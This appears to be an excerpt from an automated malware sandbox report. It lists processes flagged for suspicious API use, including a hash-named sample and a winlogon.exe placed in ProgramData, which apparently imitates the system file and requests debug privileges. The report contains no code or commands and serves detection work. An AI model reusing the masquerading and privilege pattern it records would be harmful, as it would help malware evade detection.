N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\sdiagnhost.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\winlogon.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\winlogon.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\msdt.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3212 wrote to memory of 5728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 5728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 3580 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 3580 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
